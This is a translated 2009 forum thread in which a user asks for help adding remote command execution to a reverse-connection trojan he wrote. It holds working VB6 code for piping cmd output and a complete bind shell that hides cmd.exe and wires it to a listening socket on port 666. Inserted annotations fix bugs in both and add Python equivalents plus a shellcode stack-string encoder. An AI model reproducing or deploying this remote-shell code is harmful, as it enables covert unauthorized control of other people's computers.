Title: Help with CMD Pipe vb6
Posted by: hepy_92 on 12 December 2009, 05:06 am
Hi. A few years ago I wrote a multi-connection reverse-connection trojan; I've picked it up again now because I want to use it again, and I'm working on being able to send commands to the remote cmd and get back what happens (e.g. I type dir C:\ and it returns the result, listing the files in C:\). For this I found this cmd pipe code:

```vb
'Redirects output from console program to textbox.
'Requires two textboxes and one command button.
'Set MultiLine property of Text2 to true.
'
'Original bcx version of this program was made by
' dl <dl@tks.cjb.net>
'VB port was made by Jernej Simoncic <jernej@isg.si>
'Visit Jernejs site at http://www2.arnes.si/~sopjsimo/
'
'Note: don't run plain DOS programs with this example
'under Windows 95,98 and ME, as the program freezes when
'execution of program is finished.

Option Explicit

Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long
Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO)
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long   'LPBYTE, a 4-byte pointer (the post had "As Byte"; struct padding hid the wrong size)
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

'Declared but unused: the ReadFile calls below are synchronous (lpOverlapped = 0).
Private Type OVERLAPPED
    Internal As Long
    InternalHigh As Long
    offset As Long
    OffsetHigh As Long
    hEvent As Long
End Type

Private Const STARTF_USESHOWWINDOW = &H1
Private Const STARTF_USESTDHANDLES = &H100
Private Const SW_HIDE = 0
Private Const EM_SETSEL = &HB1
Private Const EM_REPLACESEL = &HC2

Private Sub Command1_Click()
    Command1.Enabled = False
    Redirect Text1.Text, Text2
    Command1.Enabled = True
End Sub

Private Sub Form_Load()
    Text1.Text = "ping"
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
    If Command1.Enabled = False Then Cancel = True
End Sub

'cmdLine is a program plus arguments. cd and dir are cmd.exe built-ins, not programs,
'so they must be run through the interpreter: "cmd /c dir C:\". Use /c, not /k:
'/k leaves cmd alive waiting for input, so the pipe never reaches end-of-file.
Sub Redirect(cmdLine As String, objTarget As Object)
    Dim pa As SECURITY_ATTRIBUTES
    Dim pra As SECURITY_ATTRIBUTES
    Dim tra As SECURITY_ATTRIBUTES
    Dim pi As PROCESS_INFORMATION
    Dim sui As STARTUPINFO
    Dim hRead As Long
    Dim hWrite As Long
    Dim bRead As Long
    Dim lpBuffer(1024) As Byte   '1025 bytes; at most 1023 are read, so the text stays NUL-terminated

    'Inheritable pipe handles, so the child can use hWrite as its stdout/stderr.
    pa.nLength = Len(pa)
    pa.lpSecurityDescriptor = 0
    pa.bInheritHandle = True
    pra.nLength = Len(pra)
    tra.nLength = Len(tra)

    If CreatePipe(hRead, hWrite, pa, 0) <> 0 Then
        sui.cb = Len(sui)
        GetStartupInfo sui
        sui.hStdOutput = hWrite
        sui.hStdError = hWrite
        sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES
        sui.wShowWindow = SW_HIDE

        'lpEnvironment must be a NULL pointer (ByVal 0&) to inherit our environment. The post
        'passed Null, i.e. a pointer to a Variant, which the child reads as a bogus environment block.
        If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, ByVal 0&, vbNullString, sui, pi) <> 0 Then
            'Close our copy of the write end now, once. As long as the parent still holds it,
            'ReadFile can never see end-of-file, so a child that prints nothing (e.g. "cmd /c cd C:\")
            'would hang the loop. The post closed it inside the loop, after the first read.
            CloseHandle hWrite
            hWrite = 0
            SetWindowText objTarget.hwnd, ""
            Do
                Erase lpBuffer()
                'ReadFile returns 0 (ERROR_BROKEN_PIPE) once every writer has closed the pipe, i.e. when the child exits.
                If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) Then
                    SendMessage objTarget.hwnd, EM_SETSEL, -1, ByVal 0&   'drop the selection, keep the caret at the end
                    SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0)
                    DoEvents
                Else
                    CloseHandle pi.hThread
                    CloseHandle pi.hProcess
                    Exit Do
                End If
            Loop
        Else
            CloseHandle hWrite
        End If
        CloseHandle hRead
    End If
End Sub
```

To send commands like cd or dir you have to prefix them with "cmd /k" (e.g. cmd /k dir C:\); don't ask me why (if someone can explain why it has to be done that way, I'd appreciate it, hahaha). Anyway, the problem is that when I send a command like dir or cd I get this error: Run-time error '9': Subscript out of range.
Help please! Thanks in advance.
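As an added example (not code from the post or from the original VB6 author), the same pipe redirection written for POSIX in Python: os.pipe() stands in for CreatePipe, subprocess.Popen with the write end as stdout/stderr for CreateProcess with STARTF_USESTDHANDLES, os.read for ReadFile, and `sh -c` for `cmd /c`. The function names capture and run_builtin and the keep_write_end switch are mine; keep_write_end=True reproduces the failure mode of the parent keeping its copy of the write end open, which is what makes a reader block forever on a child that prints nothing.

```python
"""Capture a child's stdout+stderr through an anonymous pipe and read until EOF (POSIX)."""
import os
import select
import subprocess


def capture(argv, keep_write_end=False, timeout=1.0):
    """Run argv and return (output_bytes, saw_eof).

    keep_write_end=True leaves the parent's copy of the write end open: the child
    may exit, but the pipe still has a writer, so the reader never sees EOF and
    has to give up on the timeout instead. That is the bug to avoid.
    """
    rfd, wfd = os.pipe()
    proc = subprocess.Popen(argv, stdin=subprocess.DEVNULL, stdout=wfd, stderr=wfd)
    if not keep_write_end:
        os.close(wfd)          # correct order: drop our writer right after the spawn
    chunks = []
    saw_eof = False
    while True:
        ready, _, _ = select.select([rfd], [], [], timeout)
        if not ready:
            break              # neither data nor EOF: a dangling writer is holding the pipe
        data = os.read(rfd, 1024)
        if not data:
            saw_eof = True     # every writer closed: the child exited and we hold no copy
            break
        chunks.append(data)
    if keep_write_end:
        os.close(wfd)
    os.close(rfd)
    proc.wait()
    return b"".join(chunks), saw_eof


def run_builtin(cmd):
    """Shell built-ins (cd, dir on Windows; cd on sh) are not executables, so they must
    go through the interpreter with a flag that makes it exit afterwards: sh -c here,
    cmd /c on Windows. cmd /k would keep waiting for input and never close the pipe."""
    return capture(["sh", "-c", cmd])
```

With the write end closed correctly, capture(["true"]) returns (b"", True) immediately; with keep_write_end=True the same silent child makes the reader wait out the timeout and return (b"", False), which is the hang the VB6 loop would show for "cmd /c cd C:\".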
Title: Re: Help with CMD Pipe vb6
Posted by: cobein on 12 December 2009, 13:38 pm
There is a way to do this properly, which is to connect stdio to a socket. If I have a moment later I'll write it and post it.
Title: Re: Help with CMD Pipe vb6
Posted by: hepy_92 on 12 December 2009, 16:33 pm
OK, that would be much appreciated! Any other ideas? Thanks ;D
Title: Re: Help with CMD Pipe vb6
Posted by: hepy_92 on 13 December 2009, 16:34 pm
How do I find out which timer is the one "out of range"? And what does "out of range" mean? Sorry if my question is a bit noob, but it's been a long time since I touched VB6. Run-time error '9': Subscript out of range. Thanks :)
Title: Re: Help with CMD Pipe vb6
Posted by: shaggikpo on 14 December 2009, 02:33 am
On which line exactly does the error occur?
Title: Re: Help with CMD Pipe vb6
Posted by: cobein on 14 December 2009, 05:23 am
Right, here is the example:

```vb
'---------------------------------------------------------------------------------------
' Module    : mMS
' DateTime  : 12/13/2009 20:16
' Author    : Cobein
' Mail      : cobein27@hotmail.com
' WebPage   : http://www.advancevb.com.ar
' Purpose   : Remote shell (a bind shell: listens on PORT and hands the accepted
'             socket to cmd.exe as its stdin, stdout and stderr)
' Usage     : At your own risk
' Requirements: None (the project's startup object must be Sub Main)
' Distribution: You can freely use this code in your own
'               applications, but you may not reproduce
'               or publish this code on any web site,
'               online service, or distribute as source
'               on any media without express permission.
'
' Reference : NGS - Writing small shellcode paper
'
' History   : 12/13/2009 First Cut....................................................
'---------------------------------------------------------------------------------------
Option Explicit

Private Const INFINITE As Long = &HFFFFFFFF   'the post had &HFFFF, which is a 65-second timeout, not "wait forever"
Private Const SOCK_STREAM As Long = 1
Private Const AF_INET As Long = 2
Private Const IPPROTO_TCP As Long = 6
Private Const INVALID_SOCKET As Long = -1
Private Const STARTF_USESTDHANDLES As Long = &H100
Private Const STARTF_USESHOWWINDOW As Long = &H1

Private Const WSADESCRIPTION_LEN As Long = 257
Private Const WSASYS_STATUS_LEN As Long = 129

Public Type WSAData
    wVersion As Integer
    wHighVersion As Integer
    szDescription As String * WSADESCRIPTION_LEN
    szSystemStatus As String * WSASYS_STATUS_LEN
    iMaxSockets As Integer
    iMaxUdpDg As Integer
    lpVendorInfo As Long
End Type

Public Type sockaddr_in
    sin_family As Integer
    sin_port As Integer
    sin_addr As Long
    sin_zero(1 To 8) As Byte
End Type

Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long   'LPBYTE, a 4-byte pointer (the post had "As Byte")
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

'All Winsock imports from ws2_32.dll (the post mixed in wsock32.dll for htons and closesocket).
Private Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVR As Long, lpWSAD As WSAData) As Long
Private Declare Function WSACleanup Lib "ws2_32.dll" () As Long
Private Declare Function bind Lib "ws2_32.dll" (ByVal s As Long, ByRef name As sockaddr_in, ByVal namelen As Long) As Long   'namelen is an int by value
Private Declare Function listen Lib "ws2_32.dll" (ByVal s As Long, ByVal backlog As Long) As Long
Private Declare Function accept Lib "ws2_32.dll" (ByVal s As Long, ByRef addr As sockaddr_in, ByRef addrlen As Long) As Long
Private Declare Function htons Lib "ws2_32.dll" (ByVal hostshort As Long) As Integer
Private Declare Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal lType As Long, ByVal protocol As Long, ByRef lpProtocolInfo As Any, ByVal g As Long, ByVal dwFlags As Long) As Long
Private Declare Function closesocket Lib "ws2_32.dll" (ByVal s As Long) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Public Sub Main()
    Dim lSock As Long
    Dim lHandle As Long
    Dim lAddrLen As Long
    Dim tSA As sockaddr_in
    Dim tWD As WSAData
    Dim tSTARTUPINFO As STARTUPINFO
    Dim tPROCESS_INFORMATION As PROCESS_INFORMATION
    Dim tSECURITY_ATTRIBUTES As SECURITY_ATTRIBUTES
    Const PORT As Long = 666

    If WSAStartup(&H101, tWD) = 0 Then
        'WSASocketA with dwFlags = 0 creates a non-overlapped socket, which is what lets the
        'child use it as a plain file handle for its standard streams.
        lSock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, ByVal 0&, 0&, 0&)
        If lSock <> INVALID_SOCKET Then
            With tSA
                .sin_family = AF_INET
                .sin_port = htons(PORT)
                .sin_addr = 0           'INADDR_ANY: listens on every interface
            End With
            If bind(lSock, tSA, Len(tSA)) = 0 Then
                If listen(lSock, 1) = 0 Then
                    lAddrLen = Len(tSA)
                    lHandle = accept(lSock, tSA, lAddrLen)   'blocks here until a client connects
                    If lHandle <> INVALID_SOCKET Then
                        tSECURITY_ATTRIBUTES.nLength = Len(tSECURITY_ATTRIBUTES)
                        With tSTARTUPINFO
                            .cb = Len(tSTARTUPINFO)
                            .dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
                            .wShowWindow = 0      'SW_HIDE
                            .hStdInput = lHandle  'the accepted socket becomes all three standard handles
                            .hStdOutput = lHandle
                            .hStdError = lHandle
                        End With
                        'lpEnvironment must be a NULL pointer (ByVal 0&) to inherit our environment; the post
                        'passed 0& ByRef, i.e. a pointer to four zero bytes, which is an empty environment block.
                        'CreateProcess finds "cmd" through PATH and does not expand %VARS% in the command line,
                        'so to honour COMSPEC you would pass Environ("COMSPEC") rather than the literal.
                        If CreateProcessA(vbNullString, "cmd", _
                            tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
                            ByVal 0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then
                            Call WaitForSingleObject(tPROCESS_INFORMATION.hProcess, INFINITE)
                            Call CloseHandle(tPROCESS_INFORMATION.hThread)
                            Call CloseHandle(tPROCESS_INFORMATION.hProcess)
                        End If
                        Call closesocket(lHandle)
                    End If
                End If
            End If
            Call closesocket(lSock)
        End If
        Call WSACleanup
    End If
End Sub
```

A few things to bear in mind. 1- the code will freeze while waiting for a connection. 2- there are many structures that could be left out, but I kept them so the example is clearer. 3- you can connect using telnet (open localhost 666); on Vista, and I'm not sure about 7, telnet is not installed by default.
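As an added example (not Cobein's code), the same "stdio on a socket" handoff on POSIX in Python: subprocess.Popen dup2()s the socket's descriptor onto the child's fds 0, 1 and 2, which is what STARTUPINFO.hStdInput/hStdOutput/hStdError = accepted socket does above. socket.socketpair() stands in for the listen/accept pair so the example runs without opening a port; in a real bind shell the "remote" end would be the accepted connection. The function name shell_over_socket and the use of /bin/sh instead of cmd are my choices.

```python
"""Bind a shell's stdin/stdout/stderr to one end of a socket and drive it from the other."""
import socket
import subprocess


def shell_over_socket(script: bytes, shell=("/bin/sh",)):
    """Spawn `shell` with all three standard streams on one end of a socket pair,
    send `script` from the other end and return (output_bytes, exit_code)."""
    remote, child_end = socket.socketpair()
    proc = subprocess.Popen(
        list(shell),
        stdin=child_end,      # Popen duplicates the socket fd onto 0, 1 and 2
        stdout=child_end,
        stderr=child_end,
        close_fds=True,
    )
    # Same role as closesocket(lHandle) after CreateProcess: once the child owns its
    # copy, the parent drops its own, otherwise the socket never reaches EOF.
    child_end.close()

    remote.sendall(script)
    remote.shutdown(socket.SHUT_WR)   # no more commands: the shell reads EOF on stdin
    chunks = []
    while True:
        data = remote.recv(4096)
        if not data:                  # the shell exited and its fds 0/1/2 closed
            break
        chunks.append(data)
    remote.close()
    return b"".join(chunks), proc.wait()
```

stderr lands in the same stream as stdout because both were given the same socket, exactly as hStdOutput and hStdError share lHandle in the VB6 version; the exit code comes back separately because the socket itself carries no status.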
Title: Re: Help with CMD Pipe vb6
Posted by: Karcrack on 14 December 2009, 16:59 pm
Very nice code ;D Just one thing:

```vb
If CreateProcessA(vbNullString, "cmd", _
    tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
    0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then
```

Instead of 'cmd' I think '%COMSPEC%' would be better ;)
Title: Re: Help with CMD Pipe vb6
Posted by: YST on 14 December 2009, 20:23 pm
Very nice code ;D Just one thing:

```vb
If CreateProcessA(vbNullString, "cmd", _
    tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
    0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then
```

Instead of 'cmd' I think '%COMSPEC%' would be better ;)
On which PC wouldn't it be cmd? :xD
Title: Re: Help with CMD Pipe vb6
Posted by: hepy_92 on 14 December 2009, 23:57 pm
I didn't understand what you posted at all :S Sorry for my ignorance, I'm a newbie... but what is that?
Title: Re: Help with CMD Pipe vb6
Posted by: Karcrack on 15 December 2009, 19:56 pm
On which PC wouldn't it be cmd? :xD
Any version of W$ before XP :P Anyway, environment variables ftw!!! :xD
Title: Re: Help with CMD Pipe vb6
Posted by: YST on 15 December 2009, 20:03 pm
On which PC wouldn't it be cmd? :xD
Any version of W$ before XP :P Anyway, environment variables ftw!!! :xD
It's there on Windows 2000 ;) and the CreateProcess API exists since that Windows... so the code is always cmd, because if it isn't run on a system from Windows 2000 onwards it won't work anyway ;)
Title: Re: Help with CMD Pipe vb6
Posted by: Karcrack on 15 December 2009, 20:53 pm
It's there on Windows 2000 ;) and the CreateProcess API exists since that Windows... so the code is always cmd, because if it isn't run on a system from Windows 2000 onwards it won't work anyway ;)
On W$2000 it's called command, not cmd :-\
Title: Re: Help with CMD Pipe vb6
Posted by: YST on 15 December 2009, 21:24 pm
cmd.exe is the command interpreter on OS/2 and Windows NT-based systems (including Windows 2000, Windows XP, Windows Server 2003, and Windows Vista). http://es.wikipedia.org/wiki/Cmd_%28Windows%29
Title: Re: Help with CMD Pipe vb6
Posted by: Karcrack on 15 December 2009, 21:26 pm
So it isn't on W7 :huh: :huh: :laugh: :laugh: :laugh: :laugh:
Well, then use the environment variable and be done with it! :¬¬ :¬¬
Title: Re: Help with CMD Pipe vb6
Posted by: YST on 15 December 2009, 22:41 pm
So it isn't on W7 :huh: :huh: :laugh: :laugh: :laugh: :laugh:
Well, then use the environment variable and be done with it! :¬¬ :¬¬
It's not up to date :¬¬ By the way, the environment variable would be slower :P
Title: Re: Help with CMD Pipe vb6
Posted by: Karcrack on 15 December 2009, 23:50 pm
Okaaay... you're right :¬¬ :¬¬ "Minimum supported client: Windows 2000 Professional". CreateProcessA/W exists from W$ 2k onwards... and from W$ 2k onwards you can use cmd... so... well, it's better to use CMD directly! :P Besides, it's more useful for shellcode, since you can push the string onto the stack with a single DWORD! :silbar:

```asm
; \0,D,M,C
push $00646D63
```

:D
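As an added example (not from the post), the stack-string trick above carried through in Python: a string is split into little-endian DWORDs, NUL-terminated and zero-padded, and pushed last chunk first so that ESP ends up pointing at the string; "cmd" fits in one push of 0x00646D63, longer names need several. The function names stack_string_pushes, assemble_pushes and decode_pushes are mine; the decoder reverses the process on a run of `68 imm32` bytes such as you would see in a shellcode dump.

```python
"""Encode a NUL-terminated string as x86 `push imm32` instructions and decode it back."""
import struct

PUSH_IMM32 = 0x68   # x86 opcode: push imm32


def stack_string_pushes(s: str) -> list:
    """Immediates to push, in push order, so that after the last push ESP points at
    `s` followed by at least one NUL. Chunks are 4 bytes, little-endian; the final
    chunk is zero-padded, and a string whose NUL falls on a DWORD boundary gets an
    extra all-zero DWORD (e.g. "calc" -> push 0, then push "calc")."""
    data = s.encode("ascii") + b"\x00"
    data += b"\x00" * (-len(data) % 4)                 # pad to a multiple of 4
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # The stack grows downwards, so the tail of the string is pushed first.
    return [struct.unpack("<I", c)[0] for c in reversed(chunks)]


def assemble_pushes(s: str) -> bytes:
    """Machine code for the sequence: one `68 imm32` (5 bytes) per DWORD."""
    return b"".join(bytes([PUSH_IMM32]) + struct.pack("<I", imm)
                    for imm in stack_string_pushes(s))


def decode_pushes(code: bytes) -> str:
    """Recover the string from a run of `push imm32`: simulate the pushes onto a
    stack (each new DWORD lands below the previous ones) and read up to the first NUL."""
    stack = b""
    pos = 0
    while pos + 5 <= len(code) and code[pos] == PUSH_IMM32:
        stack = code[pos + 1:pos + 5] + stack
        pos += 5
    return stack.split(b"\x00", 1)[0].decode("ascii")
```

For "cmd.exe" this yields push 0x00657865 ("exe\0") followed by push 0x2E646D63 ("cmd."), ten bytes of code in total; the point of choosing "cmd" over "cmd.exe" or "%COMSPEC%" in shellcode is that only the three-letter form fits in a single push with its terminator.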
Title: Re: Help with CMD Pipe vb6
Posted by: hepy_92 on 18 December 2009, 14:26 pm
I don't understand any of it :o Can someone explain to me how I do it?
Title: Re: Help with CMD Pipe vb6
Posted by: Karcrack on 18 December 2009, 15:40 pm
I don't understand any of it :o Can someone explain to me how I do it?
What Cobein posted was a lovely Reverse Shell :-* :xD If you want more info: http://www.ngssoftware.com/research/papers/WritingSmallShellcode.pdf